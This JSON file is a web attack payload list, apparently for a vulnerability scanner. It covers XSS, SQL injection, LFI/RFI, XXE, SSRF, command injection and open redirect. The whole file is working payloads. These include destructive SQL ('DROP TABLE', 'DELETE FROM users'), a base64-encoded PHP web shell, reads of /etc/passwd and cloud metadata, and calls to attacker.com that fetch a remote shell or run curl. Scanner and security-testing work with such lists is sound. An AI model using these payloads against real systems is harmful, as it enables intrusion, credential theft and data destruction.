{
  "xss": {
    "html_context": [
      "<script>alert('XSS_VBP_1')</script>",
      "<img src=x onerror=alert('XSS_VBP_2')>",
      "<svg onload=alert('XSS_VBP_3')>",
      "<body onload=alert('XSS_VBP_4')>",
      "<iframe src=javascript:alert('XSS_VBP_5')>",
      "<input onfocus=alert('XSS_VBP_6') autofocus>",
      "<select onfocus=alert('XSS_VBP_7') autofocus>",
      "<textarea onfocus=alert('XSS_VBP_8') autofocus>",
      "<keygen onfocus=alert('XSS_VBP_9') autofocus>",
      "<video><source onerror=alert('XSS_VBP_10')>",
      "<audio src=x onerror=alert('XSS_VBP_11')>",
      "<marquee onstart=alert('XSS_VBP_12')>",
      "<details ontoggle=alert('XSS_VBP_13') open>",
      "<meter onmouseover=alert('XSS_VBP_14')>1</meter>",
      "<progress onmouseover=alert('XSS_VBP_15') value=1>1</progress>"
    ],
    "attribute_context": [
      "\" onmouseover=alert(\"XSS_VBP_16\") ",
      "' onfocus=alert('XSS_VBP_17') autofocus ",
      "\" autofocus onfocus=alert(\"XSS_VBP_18\") ",
      "' onmouseenter=alert('XSS_VBP_19') ",
      "\" onpointerdown=alert(\"XSS_VBP_20\") ",
      "' onpointerup=alert('XSS_VBP_21') ",
      "\" onpointerenter=alert(\"XSS_VBP_22\") ",
      "' onpointerleave=alert('XSS_VBP_23') ",
      "\" onpointermove=alert(\"XSS_VBP_24\") ",
      "' onpointerover=alert('XSS_VBP_25') "
    ],
    "javascript_context": [
      "';alert('XSS_VBP_26');//",
      "\\\\';alert('XSS_VBP_27');//",
      "${alert('XSS_VBP_28')}",
      "`;alert('XSS_VBP_29');//",
      "'-alert('XSS_VBP_30')-'",
      "\\\\'-alert('XSS_VBP_31')-\\\\'",
      ";alert('XSS_VBP_32');",
      "}alert('XSS_VBP_33');{",
      "}alert('XSS_VBP_34');//",
      "\\nalert('XSS_VBP_35')\\n"
    ],
    "url_context": [
      "javascript:alert('XSS_VBP_36')",
      "data:text/html,<script>alert('XSS_VBP_37')</script>",
      "javascript://alert('XSS_VBP_38')",
      "javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/\\\\\"/+/onmouseover=1/+/[*/[]/+alert('XSS_VBP_39')//'>",
      "vbscript:alert('XSS_VBP_40')",
      "mocha:[code]alert('XSS_VBP_41')[/code]",
      "livescript:alert('XSS_VBP_42')"
    ],
    "dom_based": [
      "#<img src=x onerror=alert('XSS_VBP_43')>",
      "#<svg onload=alert('XSS_VBP_44')>",
      "javascript:alert('XSS_VBP_45')",
      "<img src=\\x00 onerror=alert('XSS_VBP_46')>",
      "<img src=\\x01 onerror=alert('XSS_VBP_47')>"
    ],
    "polyglot": [
      "jaVasCript:/*-/*`/*\\\\`/*'/*\\\"/**/(/* */oNcliCk=alert('XSS_VBP_48') )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert('XSS_VBP_48')//>\\x3e",
      "\\\\\\\" onclick=alert('XSS_VBP_49')//",
      "<a href=\\\\\\\"javascript:alert('XSS_VBP_50')\\\\\\\">click</a>"
    ]
  },
  "sqli": {
    "error_based": [
      "'",
      "\\\"",
      "' OR '1'='1",
      "\\\" OR \\\"1\\\"=\\\"1",
      "' UNION SELECT NULL--",
      "' UNION SELECT NULL,NULL--",
      "' UNION SELECT NULL,NULL,NULL--",
      "' AND 1=1--",
      "' AND 1=2--",
      "1' AND 1=1--",
      "1' AND 1=2--",
      "' OR 1=1--",
      "\\\" OR 1=1--",
      "') OR ('1'='1",
      "\\\") OR (\\\"1\\\"=\\\"1",
      "' OR '1'='1' /*",
      "1 AND 1=1",
      "1 AND 1=2",
      "1 OR 1=1",
      "1' OR '1'='1'--"
    ],
    "union_based": [
      "' UNION SELECT NULL--",
      "' UNION SELECT NULL,NULL--",
      "' UNION SELECT NULL,NULL,NULL--",
      "' UNION SELECT NULL,NULL,NULL,NULL--",
      "' UNION SELECT 1,2,3--",
      "' UNION SELECT 'test',2,3--",
      "' UNION SELECT @@version,2,3--",
      "' UNION SELECT database(),2,3--",
      "1 UNION SELECT NULL,NULL--",
      "1 UNION SELECT 1,2,3--"
    ],
    "time_based": [
      "' AND SLEEP(5)--",
      "\\\" AND SLEEP(5)--",
      "' AND (SELECT * FROM (SELECT(SLEEP(5)))a)--",
      "'; WAITFOR DELAY '00:00:05'--",
      "1 AND SLEEP(5)",
      "1' AND SLEEP(5) AND '1'='1",
      "' AND BENCHMARK(5000000,MD5('test'))--",
      "' AND pg_sleep(5)--",
      "'; SELECT pg_sleep(5)--"
    ],
    "boolean_based": [
      "' AND '1'='1",
      "' AND '1'='2",
      "' OR 'x'='x",
      "' OR 'x'='y",
      "1 AND 1=1",
      "1 AND 1=2",
      "1' AND '1'='1'--",
      "1' AND '1'='2'--"
    ],
    "stacked_queries": [
      "'; DROP TABLE test--",
      "'; INSERT INTO users VALUES ('test','test')--",
      "'; UPDATE users SET password='test'--",
      "'; DELETE FROM users--"
    ]
  },
  "lfi": [
    "../../../etc/passwd",
    "....//....//....//etc/passwd",
    "..%2f..%2f..%2fetc%2fpasswd",
    "..\\..\\..\\windows\\win.ini",
    "..%5c..%5c..%5cwindows%5cwin.ini",
    "%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd",
    "..%252f..%252f..%252fetc%252fpasswd",
    "/etc/passwd",
    "/etc/hosts",
    "/proc/self/environ",
    "/proc/self/cmdline",
    "C:\\\\windows\\\\win.ini",
    "C:/windows/win.ini",
    "php://filter/read=convert.base64-encode/resource=index.php",
    "php://input",
    "data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=",
    "expect://id",
    "file:///etc/passwd",
    "file:///C:/windows/win.ini",
    "zip://archive.zip%23file.txt",
    "phar://archive.phar/file.txt",
    "compress.zlib://file.gz"
  ],
  "rfi": [
    "http://attacker.com/shell.txt",
    "https://attacker.com/shell.txt",
    "ftp://attacker.com/shell.txt",
    "//attacker.com/shell.txt",
    "\\\\attacker.com\\shell.txt",
    "http://0x7f000001/shell.txt",
    "http://0177.0.0.1/shell.txt",
    "http://2130706433/shell.txt"
  ],
  "xxe": [
    "<?xml version=\"1.0\" encoding=\"UTF-8\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]><foo>&xxe;</foo>",
    "<?xml version=\"1.0\" encoding=\"UTF-8\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"file:///C:/windows/win.ini\">]><foo>&xxe;</foo>",
    "<?xml version=\"1.0\" encoding=\"UTF-8\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"http://127.0.0.1:22\">]><foo>&xxe;</foo>",
    "<?xml version=\"1.0\" encoding=\"UTF-8\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"http://169.254.169.254/latest/meta-data/\">]><foo>&xxe;</foo>",
    "<?xml version=\"1.0\" encoding=\"UTF-8\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"php://filter/read=convert.base64-encode/resource=index.php\">]><foo>&xxe;</foo>",
    "<?xml version=\"1.0\" encoding=\"UTF-8\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"expect://id\">]><foo>&xxe;</foo>",
    "<?xml version=\"1.0\" encoding=\"UTF-8\"?><!DOCTYPE foo [<!ENTITY % xxe SYSTEM \"http://attacker.com/dtd\">%xxe;]><foo>test</foo>"
  ],
  "ssrf": [
    "http://127.0.0.1",
    "http://localhost",
    "http://0.0.0.0",
    "http://[::1]",
    "http://0177.0.0.1",
    "http://0x7f000001",
    "http://2130706433",
    "http://127.0.0.1:22",
    "http://127.0.0.1:3306",
    "http://127.0.0.1:6379",
    "http://169.254.169.254",
    "http://169.254.169.254/latest/meta-data/",
    "http://metadata.google.internal",
    "http://100.100.100.200",
    "file:///etc/passwd",
    "dict://127.0.0.1:11211",
    "ftp://127.0.0.1:21",
    "gopher://127.0.0.1:9000/_test",
    "http://internal-service"
  ],
  "cmd_injection": [
    "; id",
    "| id",
    "&& id",
    "|| id",
    "` id `",
    "$(id)",
    "; whoami",
    "| whoami",
    "&& whoami",
    "|| whoami",
    "; uname -a",
    "| uname -a",
    "&& uname -a",
    "; cat /etc/passwd",
    "| cat /etc/passwd",
    "; dir",
    "| dir",
    "&& dir",
    "; type C:\\\\windows\\\\win.ini",
    "; ping -c 4 127.0.0.1",
    "| ping -c 4 127.0.0.1",
    "; sleep 5",
    "| sleep 5",
    "&& sleep 5",
    "; timeout 5",
    "; nslookup attacker.com",
    "| nslookup attacker.com",
    "; curl attacker.com",
    "| curl attacker.com"
  ],
  "open_redirect": [
    "https://evil.com",
    "//evil.com",
    "\\/\\/evil.com",
    "https:evil.com",
    "http://evil.com",
    "//evil.com/%2f..",
    "https://target.com.evil.com",
    "https://evil.com?target.com",
    "https://target.com@evil.com",
    "https://evil.com#target.com",
    "javascript:alert('open_redirect')",
    "data:text/html,<script>alert('open_redirect')</script>",
    "/\\/evil.com",
    "\\/evil.com",
    "https://evil.com/\\.\\./target.com"
  ],
  "dom_xss": [
    "#<img src=x onerror=alert('DOM_XSS_1')>",
    "#<svg onload=alert('DOM_XSS_2')>",
    "?search=<img src=x onerror=alert('DOM_XSS_3')>",
    "?q=<script>alert('DOM_XSS_4')</script>"
  ]
}
